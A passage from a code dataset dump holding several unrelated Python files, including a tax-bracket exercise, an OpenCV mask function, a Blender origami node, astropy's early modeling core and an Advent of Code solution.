trainer_params[\"limit_val_batches\"] = args.limit_val_batches\r\n\r\n trainer = pl.Trainer(**trainer_params)\r\n trainer.fit(model, data_module)\r\n\r\n if remove_output:\r\n shutil.rmtree(outpath)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n run_training()\r\n","repo_name":"andreaconti/multi-view-guided-multi-view-stereo","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":11203,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"54"} +{"seq_id":"36810200804","text":"\n# ler salario anual\nsalario=float(input(\"Insira o salário anual: \"))\n\n# condição para pagar 20% taxa\nif(salario<=15000):\n imposto = salario * 0.2\n print(\"Paga taxa de 20 porcento:\", imposto, \"€\")\n\n# condição para pagar 30% taxa\nif(salario>15000 and salario<=20000):\n imposto = salario * 0.3\n print(\"Paga taxa de 30 porcento:\", imposto, \"€\")\n\n# condição para pagar 35% taxa\nif(salario>20000 and salario<=25000):\n imposto = salario * 0.35\n print(\"Paga taxa de 35 porcento:\", imposto, \"€\")\n\n# condição para pagar 40% taxa\nif(salario>25000):\n imposto = salario * 0.4\n print(\"Paga taxa de 40 porcento:\", imposto, \"€\")","repo_name":"Vmvs007/CESAE_AWSRestart","sub_path":"pythonProject/FichaPratica02/Ex_03.py","file_name":"Ex_03.py","file_ext":"py","file_size_in_byte":654,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"71894380001","text":"import numpy as np\nimport cv2 as cv\n\n\n# find the projector FOV mask\ndef thresh(im_in):\n # threshold im_diff with Otsu's method\n if im_in.ndim == 3:\n im_in = cv.cvtColor(im_in, cv.COLOR_BGR2GRAY)\n if im_in.dtype == 'float32':\n im_in = np.uint8(im_in * 255)\n _, im_mask = cv.threshold(cv.GaussianBlur(im_in, (5, 5), 0), 0, 255, cv.THRESH_BINARY + cv.THRESH_OTSU)\n im_mask = im_mask > 0\n\n # find the largest contour by area then convert it to convex hull\n im_contours, contours, hierarchy = cv.findContours(np.uint8(im_mask), cv.RETR_TREE, cv.CHAIN_APPROX_SIMPLE)\n hulls = cv.convexHull(max(contours, key=cv.contourArea))\n im_mask = cv.fillConvexPoly(np.zeros_like(im_mask, dtype=np.uint8), hulls, True) > 0\n\n # also calculate the bounding box\n bbox = cv.boundingRect(max(contours, key=cv.contourArea))\n corners = [[bbox[0], bbox[1]], [bbox[0] + bbox[2], bbox[1]], [bbox[0] + bbox[2], bbox[1] + bbox[3]], [bbox[0], bbox[1] + bbox[3]]]\n\n # normalize to (-1, 1) following pytorch grid_sample coordinate system\n h = im_in.shape[0]\n w = im_in.shape[1]\n\n for pt in corners:\n pt[0] = 2 * (pt[0] / w) - 1\n pt[1] = 2 * (pt[1] / h) - 1\n\n return im_mask, corners\n","repo_name":"BingyaoHuang/CompenNet-plusplus","sub_path":"src/python/ImgProc.py","file_name":"ImgProc.py","file_ext":"py","file_size_in_byte":1229,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"54"} +{"seq_id":"37777196690","text":"import bpy\nfrom bpy.props import IntProperty, FloatProperty\nfrom sverchok.data_structure import updateNode, match_long_repeat\nfrom sverchok.node_tree import SverchCustomTreeNode\nfrom sverchok.utils.rigid_origami_utils import ObjectParams, \\\n\t\tCreaseLines, InsideVertex, FoldAngleCalculator, FaceRotation\nfrom sverchok.utils.nodes_mixins.sockets_config import TransformNode\n\n\nclass SvRigidOrigamiNode(TransformNode, SverchCustomTreeNode, bpy.types.Node):\n \"\"\"\n Triggers: Rigid Origami\n Tooltip: Fold a paper like a rigid origami\n \"\"\"\n\n bl_idname = 'SvRigidOrigamiNode'\n bl_label = 'Rigid Origami'\n bl_icon = 'OUTLINER_OB_EMPTY'\n sv_icon = 'SV_ORIGAMI'\n\n folding_ratio : FloatProperty(\n name=\"Folding ratio\",\n description=\"Folding ratio from 0.0 to 1.0\",\n default=0.0,\n min=0.0, max=1.0,\n update=updateNode)\n\n division_count : IntProperty(\n name=\"Division count\",\n description=\"Count of dividing angles to calculate precisely\",\n default=20,\n min=1, max=100,\n update=updateNode)\n\n fixed_face_index : IntProperty(\n name=\"Fixed face index\",\n description=\"Index of fixed face when folding\",\n default=0,\n update=updateNode)\n\n def sv_init(self, context):\n self.inputs.new('SvVerticesSocket', 'Vertices')\n self.inputs.new('SvStringsSocket', 'Edges')\n self.inputs.new('SvStringsSocket', 'Faces')\n\n self.inputs.new('SvStringsSocket', 'Fold edge indices')\n self.inputs.new('SvStringsSocket', 'Fold edge angles')\n\n self.inputs.new('SvStringsSocket', 'Folding ratio').prop_name = 'folding_ratio'\n self.inputs.new('SvStringsSocket', 'Division count').prop_name = 'division_count'\n self.inputs.new('SvStringsSocket', 'Fixed face index').prop_name = 'fixed_face_index'\n\n self.outputs.new('SvVerticesSocket', 'Vertices')\n\n def process(self):\n if not any(socket.is_linked for socket in self.outputs):\n return\n \n if not self.inputs['Fold edge indices'].is_linked \\\n or not self.inputs['Fold edge angles'].is_linked:\n return\n \n verts_in = self.inputs['Vertices'].sv_get()\n edges_in = self.inputs['Edges'].sv_get()\n faces_in = self.inputs['Faces'].sv_get()\n\n fold_edge_indices = self.inputs['Fold edge indices'].sv_get()\n fold_edge_angles = self.inputs['Fold edge angles'].sv_get()\n\n folding_ratio = self.inputs['Folding ratio'].sv_get()\n division_count = self.inputs['Division count'].sv_get()\n fixed_face_index = self.inputs['Fixed face index'].sv_get()\n\n meshes = match_long_repeat([verts_in, edges_in, faces_in, \\\n fold_edge_indices, fold_edge_angles, folding_ratio, \\\n division_count, fixed_face_index])\n\n verts_out = []\n for verts, edges, faces, edge_indices, edge_angles, \\\n folding, step, fixed_face in zip(*meshes):\n\n if isinstance(folding, (list, tuple)):\n folding = folding[0]\n if isinstance(step, (list, tuple)):\n step = step[0]\n if isinstance(fixed_face, (list, tuple)):\n fixed_face = fixed_face[0]\n\n verts_o = verts\n try:\n # Wrap object\n obj = ObjectParams(verts, edges, faces)\n\n # Extract crease lines\n crease_lines = CreaseLines(obj, edge_indices, edge_angles, folding)\n\n if edge_indices:\n # Extract inside vertices\n inside_vertices = InsideVertex.generate_inside_vertices( \\\n obj, crease_lines)\n # Calculation loop to determine the final angles\n FoldAngleCalculator.calc_fold_angle(step, crease_lines, inside_vertices)\n\n crease_lines.delta_angles = [cur_rho - angle for cur_rho, angle \\\n in zip(FoldAngleCalculator.current_rhos, crease_lines.angles)]\n\n # Rotate each faces using final angles\n FaceRotation.obj = obj\n FaceRotation.inside_vertices = inside_vertices\n FaceRotation.crease_lines = crease_lines\n FaceRotation.fixed_face_index = int(fixed_face)\n verts_o = FaceRotation.rotate_faces()\n\n verts_out.append(verts_o)\n finally:\n if obj is not None:\n obj.free()\n\n self.outputs['Vertices'].sv_set(verts_out)\n\ndef register():\n bpy.utils.register_class(SvRigidOrigamiNode)\n\ndef unregister():\n bpy.utils.unregister_class(SvRigidOrigamiNode)\n","repo_name":"nortikin/sverchok","sub_path":"nodes/modifier_change/rigid_origami.py","file_name":"rigid_origami.py","file_ext":"py","file_size_in_byte":4757,"program_lang":"python","lang":"en","doc_type":"code","stars":2098,"dataset":"github-code","pt":"54"} +{"seq_id":"16874279996","text":"# Licensed under a 3-clause BSD style license - see LICENSE.rst\n\"\"\"\nThis module defines base classes for all models.\nThe base class of all models is `~astropy.modeling.Model`.\n`~astropy.modeling.ParametricModel` is the base class for all fittable models. Parametric\nmodels can be linear or nonlinear in a regression analysis sense.\n\nAll models provide a `__call__` method which performs the transformation in a\npurely mathematical way, i.e. the models are unitless. In addition, when\npossible the transformation is done using multiple parameter sets, `param_sets`.\nThe number of parameter sets is stored in an attribute `param_dim`.\n\nParametric models also store a flat list of all parameters as an instance of\n`~astropy.modeling.parameters.Parameters`. When fitting, this list-like object is modified by a\nsubclass of `~astropy.modeling.fitting.Fitter`. When fitting nonlinear models, the values of the\nparameters are used as initial guesses by the fitting class. Normally users\nwill not have to use the `~astropy.modeling.parameters` module directly.\n\nInput Format For Model Evaluation and Fitting\n\nInput coordinates are passed in separate arguments, for example 2D models\nexpect x and y coordinates to be passed separately as two scalars or aray-like\nobjects.\nThe evaluation depends on the input dimensions and the number of parameter\nsets but in general normal broadcasting rules apply.\nFor example:\n\n- A model with one parameter set works with input in any dimensionality\n\n- A model with N parameter sets works with 2D arrays of shape (M, N).\n A parameter set is applied to each column.\n\n- A model with N parameter sets works with multidimensional arrays if the\n shape of the input array is (N, M, P). A parameter set is applied to each plane.\n\nIn all these cases the output has the same shape as the input.\n\n- A model with N parameter sets works with 1D input arrays. The shape\n of the output is (M, N)\n\n\"\"\"\nfrom __future__ import division, print_function\nimport abc\nfrom ..utils.compat.odict import OrderedDict\nimport numpy as np\nfrom . import parameters\nfrom . import constraints\nfrom .utils import InputParameterError\n\n__all__ = ['Model', 'ParametricModel', 'PCompositeModel', 'SCompositeModel',\n 'LabeledInput', '_convert_input', '_convert_output']\n\n\ndef _convert_input(x, pdim):\n \"\"\"\n Format the input into appropriate shape\n\n Parameters\n ----------\n x : scalar, array or a sequence of numbers\n input data\n pdim : int\n number of parameter sets\n\n The meaning of the internally used format is:\n\n 'N' - the format of the input was not changed\n 'T' - input was transposed\n 'S' - input is a scalar\n \"\"\"\n x = np.asarray(x) + 0.\n fmt = 'N'\n if pdim == 1:\n if x.ndim == 0:\n fmt = 'S'\n return x, fmt\n else:\n return x, fmt\n else:\n if x.ndim < 2:\n fmt = 'N'\n return np.array([x]).T, fmt\n elif x.ndim == 2:\n assert x.shape[-1] == pdim, \"Cannot broadcast with shape\"\\\n \"({0}, {1})\".format(x.shape[0], x.shape[1])\n return x, fmt\n elif x.ndim > 2:\n assert x.shape[0] == pdim, \"Cannot broadcast with shape \" \\\n \"({0}, {1}, {2})\".format(x.shape[0], x.shape[1], x.shape[2])\n fmt = 'T'\n return x.T, fmt\n\n\ndef _convert_output(x, fmt):\n \"\"\"\n Put the output in the shpae/type of the original input\n\n Parameters\n ----------\n x : scalar, array or a sequence of numbers\n output data\n fmt : string\n original format\n \"\"\"\n if fmt == 'N':\n return x\n elif fmt == 'T':\n return x.T\n elif fmt == 'S':\n return x[0]\n else:\n raise ValueError(\"Unrecognized output conversion format\")\n\n\nclass _ParameterProperty(object):\n\n \"\"\"\n Create a property for a parameter.\n\n Parameters\n ----------\n name: string\n the name of the parameter\n\n \"\"\"\n def __init__(self, name):\n self.aname = '_' + name\n self.name = name\n\n def __get__(self, obj, objtype):\n par = getattr(obj, self.aname)\n return par\n\n def __set__(self, obj, val):\n if self.name in obj._parcheck:\n obj._parcheck[self.name](val)\n if isinstance(obj, ParametricModel):\n if not obj._parameters._changed:\n par = parameters.Parameter(self.name, val, obj, obj.param_dim)\n oldpar = getattr(obj, self.name)\n if oldpar is not None and oldpar.parshape != par.parshape:\n raise InputParameterError(\n \"Input parameter {0} does not \"\n \"have the required shape\".format(self.name))\n else:\n setattr(obj, self.aname, par)\n obj._parameters = parameters.Parameters(obj,\n obj.param_names,\n param_dim=obj.param_dim)\n else:\n setattr(obj, self.aname, val)\n else:\n par = parameters.Parameter(self.name, val, obj, obj.param_dim)\n oldpar = getattr(obj, self.name)\n if oldpar is not None and oldpar.parshape != par.parshape:\n raise InputParameterError(\n \"Input parameter {0} does not \"\n \"have the required shape\".format(self.name))\n else:\n setattr(obj, self.aname, par)\n\n\nclass Model(object):\n\n \"\"\"\n Base class for all models.\n\n This is an abstract class and should not be instanciated.\n\n Notes\n -----\n Models which are not meant to be fit to data should subclass this class\n\n This class sets the properties for all individual parameters and performs\n parameter validation.\n\n \"\"\"\n __metaclass__ = abc.ABCMeta\n\n param_names = []\n\n def __init__(self, param_names, n_inputs, n_outputs, param_dim=1):\n self._param_dim = param_dim\n self._n_inputs = n_inputs\n self._n_outputs = n_outputs\n self.has_inverse = False\n self._param_names = param_names\n #_parcheck is a dictionary to register parameter validation funcitons\n # key: value pairs are parameter_name: parameter_validation_function_name\n # see projections.AZP for example\n self._parcheck = {}\n for par in param_names:\n setattr(self.__class__, par, _ParameterProperty(par))\n\n @property\n def n_inputs(self):\n \"\"\"\n Number of input variables in model evaluation.\n \"\"\"\n return self._n_inputs\n\n @property\n def n_outputs(self):\n \"\"\"\n Number of output variables returned when a model is evaluated.\n \"\"\"\n return self._n_outputs\n\n @property\n def param_dim(self):\n \"\"\"\n Number of parameter sets in a model.\n \"\"\"\n return self._param_dim\n\n @param_dim.setter\n def param_dim(self, val):\n \"\"\"\n Set the number of parameter sets in a model.\n \"\"\"\n self._param_dim = val\n\n @property\n def param_names(self):\n \"\"\"\n A list of names of the parameters defining a model.\n \"\"\"\n return self._param_names\n\n @param_names.setter\n def param_names(self, val):\n self._param_names = val\n\n def __repr__(self):\n fmt = \"{0}(\".format(self.__class__.__name__)\n for i in range(len(self.param_names)):\n fmt1 = \"\"\"\n {0}={1},\n \"\"\".format(self.param_names[i], getattr(self, self.param_names[i]))\n fmt += fmt1\n fmt += \")\"\n\n return fmt\n\n def __str__(self):\n\n fmt = \"\"\"\n Model: {0}\n Parameter sets: {1}\n Parameters:\n {2}\n \"\"\".format(\n self.__class__.__name__,\n self.param_dim,\n \"\\n \".join(i + ': ' +\n str(self.__getattribute__(i)) for i in self.param_names)\n )\n\n return fmt\n\n @property\n def param_sets(self):\n \"\"\"\n Return parameters as a pset.\n This is an array where each column represents one parameter set.\n \"\"\"\n parameters = [getattr(self, attr) for attr in self.param_names]\n shapes = [par.parshape for par in parameters]\n lenshapes = np.asarray([len(p.parshape) for p in parameters])\n shapes = [p.parshape for p in parameters]\n if (lenshapes > 1).any():\n if () in shapes:\n psets = np.asarray(parameters, dtype=np.object)\n else:\n psets = np.asarray(parameters)\n else:\n psets = np.asarray(parameters)\n psets.shape = (len(self.param_names), self.param_dim)\n return psets\n\n def inverse(self):\n \"\"\"\n Return a callable object which does the inverse transform\n \"\"\"\n raise NotImplementedError(\"Subclasses should implement this\")\n\n def invert(self):\n \"\"\"\n Invert coordinates iteratively if possible\n \"\"\"\n raise NotImplementedError(\"Subclasses should implement this\")\n\n def add_model(self, newtr, mode):\n \"\"\"\n Create a CompositeModel by chaining the current model with the new one\n using the specified mode.\n\n Parameters\n ----------\n newtr : an instance of a subclass of Model\n mode : string\n 'parallel', 'serial', 'p' or 's'\n a flag indicating whether to combine the models\n in series or in parallel\n\n Returns\n -------\n model : CompositeModel\n an instance of CompositeModel\n \"\"\"\n if mode in ['parallel', 'p']:\n return PCompositeModel([self, newtr])\n elif mode in ['serial', 's']:\n return SCompositeModel([self, newtr])\n else:\n raise InputParameterError(\"Unrecognized mode {0}\".format(mode))\n\n @abc.abstractmethod\n def __call__(self):\n raise NotImplementedError(\"Subclasses should implement this\")\n\n\nclass ParametricModel(Model):\n\n \"\"\"\n Base class for all fittable models.\n\n Notes\n -----\n All models which can be fit to data and provide a `deriv` method\n should subclass this class.\n\n Sets the parameters attributes.\n\n Parameters\n ----------\n param_names: list\n parameter names\n n_inputs: int\n number of inputs\n n_outputs: int\n number of output quantities\n param_dim: int\n number of parameter sets\n fittable: boolean\n indicator if the model is fittable\n fixed: a dict\n a dictionary {parameter_name: boolean} of parameters to not be\n varied during fitting. True means the parameter is held fixed.\n Alternatively the `~astropy.modeling.parameters.Parameter.fixed`\n property of a parameter may be used.\n tied: dict\n a dictionary {parameter_name: callable} of parameters which are\n linked to some other parameter. The dictionary values are callables\n providing the linking relationship.\n Alternatively the `~astropy.modeling.parameters.Parameter.tied`\n property of a parameter may be used.\n bounds: dict\n a dictionary {parameter_name: boolean} of lower and upper bounds of\n parameters. Keys are parameter names. Values are a list of length\n 2 giving the desired range for the parameter.\n Alternatively the `~astropy.modeling.parameters.Parameter.min` and\n `~astropy.modeling.parameters.Parameter.max` properties of a parameter\n may be used.\n eqcons: list\n A list of functions of length n such that\n eqcons[j](x0,*args) == 0.0 in a successfully optimized\n problem.\n ineqcons : list\n A list of functions of length n such that\n ieqcons[j](x0,*args) >= 0.0 is a successfully optimized\n problem.\n \"\"\"\n __metaclass__ = abc.ABCMeta\n\n def __init__(self, param_names, n_inputs, n_outputs, param_dim=1, fittable=True,\n fixed=None, tied=None, bounds=None, eqcons=None, ineqcons=None):\n self.linear = True\n super(ParametricModel, self).__init__(param_names, n_inputs, n_outputs, param_dim=param_dim)\n self.fittable = fittable\n self._parameters = parameters.Parameters(self, self.param_names,\n param_dim=param_dim)\n # Initialize the constraints for each parameter\n _fixed = {}.fromkeys(self.param_names, False)\n _tied = {}.fromkeys(self.param_names, False)\n _bounds = {}.fromkeys(self.param_names, [-1.E12, 1.E12])\n if eqcons is None:\n eqcons = []\n if ineqcons is None:\n ineqcons = []\n self.constraints = constraints.Constraints(self, fixed=_fixed,\n tied=_tied,\n bounds=_bounds,\n eqcons=eqcons,\n ineqcons=ineqcons)\n # Set constraints\n if fixed:\n for name in fixed:\n par = getattr(self, name)\n setattr(par, 'fixed', fixed[name])\n if tied:\n for name in tied:\n par = getattr(self, name)\n setattr(par, 'tied', tied[name])\n if bounds:\n for name in bounds:\n par = getattr(self, name)\n setattr(par, 'min', bounds[name][0])\n setattr(par, 'max', bounds[name][1])\n\n def __repr__(self):\n try:\n degree = str(self.deg)\n except AttributeError:\n degree = \"\"\n try:\n param_dim = str(self.param_dim)\n except AttributeError:\n param_dim = \" \"\n\n if degree:\n fmt = \"<{0}({1},\".format(self.__class__.__name__, repr(self.deg))\n else:\n fmt = \"<{0}(\".format(self.__class__.__name__)\n for i in range(len(self.param_names)):\n fmt1 = \"\"\"\n {0}={1},\n \"\"\".format(self.param_names[i], getattr(self, self.param_names[i]))\n fmt += fmt1.strip()\n if param_dim:\n fmt += \"param_dim={0})>\".format(self.param_dim)\n\n return fmt\n\n def __str__(self):\n try:\n degree = str(self.deg)\n except AttributeError:\n degree = 'N/A'\n fmt = \"\"\"\n Model: {0}\n Dim: {1}\n Degree: {2}\n Parameter sets: {3}\n Parameters:\n {4}\n \"\"\".format(\n self.__class__.__name__,\n self.n_inputs,\n degree,\n self.param_dim,\n \"\\n \".join(i + ': ' +\n str(self.__getattribute__(i)) for i in self.param_names)\n )\n\n return fmt\n\n @property\n def parameters(self):\n \"\"\"\n An instance of `~astropy.modeling.parameters.Parameters`.\n Fittable parameters maintain this list and fitters modify it.\n \"\"\"\n return self._parameters\n\n @parameters.setter\n def parameters(self, value):\n \"\"\"\n Reset the parameters attribute as an instance of\n `~astropy.modeling.parameters.Parameters`\n \"\"\"\n if isinstance(value, parameters.Parameters):\n if self._parameters._is_same_length(value):\n self._parameters = value\n else:\n raise InputParameterError(\n \"Expected the list of parameters to be the same \"\n \"length as the initial list.\")\n elif isinstance(value, (list, np.ndarray)):\n _val = parameters._tofloat(value)[0]\n if self._parameters._is_same_length(_val):\n self._parameters._changed = True\n self._parameters[:] = _val\n else:\n raise InputParameterError(\n \"Expected the list of parameters to be the same \"\n \"length as the initial list.\")\n else:\n raise TypeError(\"Parameters must be of type 'list' or 'Parameters'\")\n\n def set_joint_parameters(self, jpars):\n \"\"\"\n Used by the JointFitter class to store parameters which are\n considered common for several models and are to be fitted together.\n \"\"\"\n self.joint = jpars\n\n\nclass LabeledInput(dict):\n\n \"\"\"\n Create a container with all input data arrays, assigning labels for\n each one.\n\n Used by CompositeModel to choose input data using labels\n\n Parameters\n ----------\n data : list\n a list of all input data\n labels : list of strings\n names matching each coordinate in data\n\n Returns\n -------\n data : LabeledData\n a dict of input data and their assigned labels\n\n Examples\n --------\n >>> x,y = np.mgrid[:10, :10]\n >>> l = np.arange(10)\n >>> ado = LabeledInput([x, y, l], ['x', 'y', 'pixel'])\n >>> ado.x\n array([[0, 0, 0, 0, 0],\n [1, 1, 1, 1, 1],\n [2, 2, 2, 2, 2],\n [3, 3, 3, 3, 3],\n [4, 4, 4, 4, 4]])\n >>> ado['x']\n array([[0, 0, 0, 0, 0],\n [1, 1, 1, 1, 1],\n [2, 2, 2, 2, 2],\n [3, 3, 3, 3, 3],\n [4, 4, 4, 4, 4]])\n\n \"\"\"\n def __init__(self, data, labels):\n dict.__init__(self)\n assert len(labels) == len(data)\n self.labels = [l.strip() for l in labels]\n for coord, label in zip(data, labels):\n self[label] = coord\n setattr(self, '_' + label, coord)\n self._set_properties(self.labels)\n\n def _getlabel(self, name):\n par = getattr(self, '_' + name)\n return par\n\n def _setlabel(self, name, val):\n setattr(self, '_' + name, val)\n self[name] = val\n\n def _dellabel(self, name):\n delattr(self, '_' + name)\n del self[name]\n\n def add(self, label=None, value=None, **kw):\n \"\"\"\n Add input data to a LabeledInput object\n\n Parameters\n --------------\n label : string\n coordinate label\n value : numerical type\n coordinate value\n kw : dictionary\n if given this is a dictionary of {label: value} pairs\n\n \"\"\"\n if kw:\n if label is None or value is None:\n self.update(kw)\n else:\n kw[label] = value\n self.update(kw)\n else:\n kw = dict({label: value})\n assert(label is not None and value is not None), (\n \"Expected label and value to be defined\")\n self[label] = value\n\n for key in kw:\n self.__setattr__('_' + key, kw[key])\n self._set_properties(kw.keys())\n\n def _set_properties(self, attributes):\n for attr in attributes:\n setattr(self.__class__, attr, property(lambda self, attr=attr:\n self._getlabel(attr),\n lambda self, value, attr=attr:\n self._setlabel(attr, value),\n lambda self, attr=attr:\n self._dellabel(attr)\n )\n )\n\n def copy(self):\n data = [self[label] for label in self.labels]\n return LabeledInput(data, self.labels)\n\n\nclass _CompositeModel(OrderedDict):\n\n def __init__(self, transforms, inmap=None, outmap=None):\n \"\"\"\n A Base class for all composite models.\n\n \"\"\"\n OrderedDict.__init__(self)\n self.n_inputs = None\n self.n_outputs = None\n self.fittable = False\n self.has_inverse = np.array([tr.has_inverse for tr in transforms]).all()\n\n def _init_comptr(self, trans, inmap, outmap):\n # implemented by subclasses\n raise NotImplementedError(\"Subclasses should implement this\")\n\n def __repr__(self):\n transforms = self.keys()\n fmt = \"\"\"\n Model: {0}\n \"\"\".format(self.__class__.__name__)\n fmt1 = \" %s \" * len(transforms) % tuple([repr(tr) for tr in transforms])\n fmt = fmt + fmt1\n return fmt\n\n def __str__(self):\n transforms = self.keys()\n fmt = \"\"\"\n Model: {0}\n \"\"\".format(self.__class__.__name__)\n fmt1 = \" %s \" * len(transforms) % tuple([str(tr) for tr in transforms])\n fmt = fmt + fmt1\n return fmt\n\n def add_model(self, transf, inmap, outmap):\n self[transf] = [inmap, outmap]\n\n def invert(self):\n raise NotImplementedError(\"Subclasses should implement this\")\n\n def __call__(self):\n # implemented by subclasses\n raise NotImplementedError(\"Subclasses should implement this\")\n\n\nclass SCompositeModel(_CompositeModel):\n\n \"\"\"\n\n Execute models in series.\n\n Parameters\n ----------\n transforms : list\n a list of transforms in the order to be executed\n inmap : list of lists or None\n labels in an input instance of LabeledInput\n if None, the number of input coordinates is exactly what\n the transforms expect\n outmap : list or None\n labels in an input instance of LabeledInput\n if None, the number of output coordinates is exactly what\n the transforms expect\n\n Returns\n -------\n model : SCompositeModel\n Composite model which executes the comprising models in series\n\n Notes\n -----\n Output values of one model are used as input values of another.\n Obviously the order of the models matters.\n\n Examples\n --------\n Apply a 2D rotation followed by a shift in x and y::\n\n >>> from astropy.modeling import *\n >>> rot = models.MatrixRotation2D(angle=23.5)\n >>> offx = models.ShiftModel(-4.23)\n >>> offy = models.ShiftModel(2)\n >>> linp = LabeledInput([x, y], [\"x\", \"y\"])\n >>> scomptr = SCompositeModel([rot, offx, offy],\n ... inmap=[['x', 'y'], ['x'], ['y']],\n ... outmap=[['x', 'y'], ['x'], ['y']])\n >>> result=scomptr(linp)\n\n \"\"\"\n def __init__(self, transforms, inmap=None, outmap=None):\n super(SCompositeModel, self).__init__(transforms, inmap, outmap)\n if transforms and inmap and outmap:\n assert len(transforms) == len(inmap) == len(outmap), \\\n \"Expected sequences of transform, \" \\\n \"inmap and outmap to have the same length\"\n if inmap is None:\n inmap = [None] * len(transforms)\n if outmap is None:\n outmap = [None] * len(transforms)\n\n self._init_comptr(transforms, inmap, outmap)\n self.n_inputs = np.array([tr.n_inputs for tr in self]).max()\n # the output dimension is equal to the output dim of the last transform\n self.n_outputs = self.keys()[-1].n_outputs\n\n def _init_comptr(self, transforms, inmap, outmap):\n for tr, inm, outm in zip(transforms, inmap, outmap):\n self[tr] = [inm, outm]\n\n def _verify_no_mapper_input(self, *data):\n lendata = len(data)\n tr = self.keys()[0]\n\n if tr.n_inputs != lendata:\n\n raise ValueError(\"Required number of coordinates not matched for \"\n \"transform # {0}: {1} required, {2} supplied \".format(\n self.keys().index(tr) + 1, tr.n_inputs, lendata))\n\n def invert(self, inmap, outmap):\n scomptr = SCompositeModel(self[::-1], inmap=inmap, outmap=outmap)\n return scomptr\n\n def __call__(self, x, *data):\n \"\"\"\n Transforms data using this model.\n \"\"\"\n lendata = len(data) + 1\n if lendata == 1:\n if not isinstance(x, LabeledInput):\n data = np.asarray(x, dtype=np.float64)\n self._verify_no_mapper_input(data)\n result = data\n for tr in self:\n result = tr(result)\n return result\n else:\n linp = x.copy()\n # we want to return the entire labeled object because some parts\n # of it may not be used in another transform of which this\n # one is a component\n for tr in self:\n inmap = self[tr][0]\n outmap = self[tr][1]\n inlist = [getattr(linp, co) for co in inmap]\n result = tr(*inlist)\n if tr.n_outputs == 1:\n result = [result]\n for outcoo, res in zip(outmap, result):\n if outcoo not in inmap:\n linp.add(outcoo, res)\n else:\n linp[outcoo] = res\n setattr(linp, outcoo, res)\n return linp\n else:\n inlist = [x]\n inlist.extend(data)\n self._verify_no_mapper_input(*inlist)\n result = self.keys()[0](*inlist)\n for tr in self.keys()[1:]:\n result = tr(result)\n return result\n\n\nclass PCompositeModel(_CompositeModel):\n\n \"\"\"\n\n Execute models in parallel.\n\n Parameters\n --------------\n transforms : list\n transforms to be executed in parallel\n inmap : list or None\n labels in an input instance of LabeledInput\n if None, the number of input coordinates is exactly what the\n transforms expect\n\n Returns\n -------\n model : PCompositeModel\n Composite model which executes the comprising models in parallel\n\n Notes\n -----\n Models are applied to input data separately and the deltas are summed.\n\n \"\"\"\n def __init__(self, transforms, inmap=None, outmap=None):\n super(PCompositeModel, self).__init__(transforms, inmap=None, outmap=None)\n self._init_comptr(transforms, inmap, outmap)\n self.n_inputs = self.keys()[0].n_inputs\n self.n_outputs = self.n_inputs\n self.inmap = inmap\n self.outmap = outmap\n\n def _init_comptr(self, transforms, inmap, outmap):\n for tr in transforms:\n self[tr] = [inmap, outmap]\n\n def _verify_no_mapper_input(self, *data):\n ndim = self.keys()[0].n_inputs\n for tr in self.keys():\n if tr.n_inputs != ndim:\n raise ValueError(\"tr.n_inputs ...\")\n\n def invert(self, inmap, outmap):\n pcomptr = PCompositeModel(self.keys()[::-1], inmap=inmap, outmap=outmap)\n return pcomptr\n\n def __call__(self, x, *data):\n \"\"\"\n Transforms data using this model.\n \"\"\"\n lendata = len(data) + 1\n if lendata == 1:\n if not isinstance(x, LabeledInput):\n self._verify_no_mapper_input(x)\n result = x.copy()\n for tr in self:\n delta = tr(x) - x\n result = result + delta\n return result\n else:\n assert self.inmap is not None, (\"Parameter 'inmap' must be \"\n \"provided when input is a labeled object\")\n assert self.outmap is not None, (\"Parameter 'outmap' must be \"\n \"provided when input is a labeled object\")\n linp = x.copy()\n # create a list of inputs to be passed to the transforms\n inlist = [getattr(linp, co) for co in self.inmap]\n # create a list of outputs to which the deltas are applied\n result = [getattr(linp, co) for co in self.outmap]\n res = [tr(*inlist) for tr in self]\n delta = (np.asarray(res) - np.asarray(result)).sum(axis=0)\n result = np.asarray(result) + delta\n for outcoo, res in zip(self.outmap, result):\n linp[outcoo] = res\n setattr(linp, outcoo, res)\n # always return the entire labeled object, not just the result\n # since this may be part of another composite transform\n return linp\n else:\n self._verify_no_mapper_input(x, *data)\n inlist = [x]\n inlist.extend(list(data))\n result = inlist[:]\n for tr in self.keys():\n res = tr(*inlist)\n for i in range(len(inlist)):\n result[i] = res[i] - inlist[i]\n return result\n","repo_name":"RayPlante/astropy","sub_path":"astropy/modeling/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":28553,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"54"} +{"seq_id":"33918725188","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\nfrom common import *\n\n\noo = int(ls[0].split(' ')[-1])\not = int(ls[1].split(' ')[-1])\n\n\n# part 1\no, t = oo, ot\nos = ts = 0\nd = count(1)\nn = True\nwhile os < 1000 and ts < 1000:\n if n:\n o = (o + next(d) + next(d) + next(d) - 1) % 10 + 1\n os += o\n else:\n t = (t + next(d) + next(d) + next(d) - 1) % 10 + 1\n ts += t\n n = not n\nsm(min(os, ts) * (next(d) - 1))\n\n\n# part 2\ndef rec(o, t, os, ts, n):\n if os >= 21:\n return 1, 0\n if ts >= 21:\n return 0, 1\n ow = tw = 0\n for r, p in [(3, 1), (4, 3), (5, 6), (6, 7), (7, 6), (8, 3), (9, 1)]:\n if n:\n no = (o + r - 1) % 10 + 1\n co, ct = rec(no, t, os + no, ts, False)\n else:\n nt = (t + r - 1) % 10 + 1\n co, ct = rec(o, nt, os, ts + nt, True)\n ow += p * co\n tw += p * ct\n return ow, tw\n\n\nsm(max(rec(oo, ot, 0, 0, True)))\n","repo_name":"zswaff/advent","sub_path":"2021/21/sln.py","file_name":"sln.py","file_ext":"py","file_size_in_byte":943,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"33959898264","text":"\"\"\"\n多进程间的通信 >>>Queue队列 队列特点:先进先出 CBA >>>CBA\n栈 >>> 先进后出\n\"\"\"\n# 队列 >>> 先进先出\n# import multiprocessing\n# q = multiprocessing.Queue(3) # 创建 Q队列 对象,参数表示:容器大小,无参数可以无限放。\n# # 